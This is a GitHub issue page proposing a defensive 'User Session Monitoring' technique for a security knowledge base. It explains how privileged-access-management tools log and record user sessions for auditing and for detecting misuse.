New (or Modified) Technique: User Session Monitoring #363
Labels
Comments
|
Potential related issues: |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
User Session Monitoring
A potential place for this concept is under Platform Monitoring, though maybe this can belong under another Detect area.
Digital Artifacts
Definition
User sessions can be monitored in a live or retroactive manner in a number of ways, including authentication (login/logoff), system logs, keylogging/command history, live user behavior analytics, and screen capture (video or screenshots).
How it works
Some PAM (and other types of) tools can capture user actions via the methods described in the definition to be able to monitor privileged user activities, such as graphically recording RDP sessions. This may be done for auditing purposes when a privileged user's session involves actions that indicate misuse, unintentional introduction of vulnerability, etcetera. It also may be performed to catch threat actors in-the-act without their knowledge, though this is an edge use case. In general the concept of monitoring also involves non-repudiation. For PAM tools that perform graphical capture this often is done by having network traffic routed through a proxy node where that node has the resources to handle the recording process. For PAM tools that perform log and command monitoring although data can be shipped to a SIEM the tools themselves also typically have interfaces for filtering activity, allowing PAM administrators to terminate sessions that seem suspicious.
Considerations
When using this feature the following should be considered:
References
There are other examples of this but here is one: https://docs.delinea.com/online-help/secret-server/session-recording/session-rec-overview.htm
The text was updated successfully, but these errors were encountered: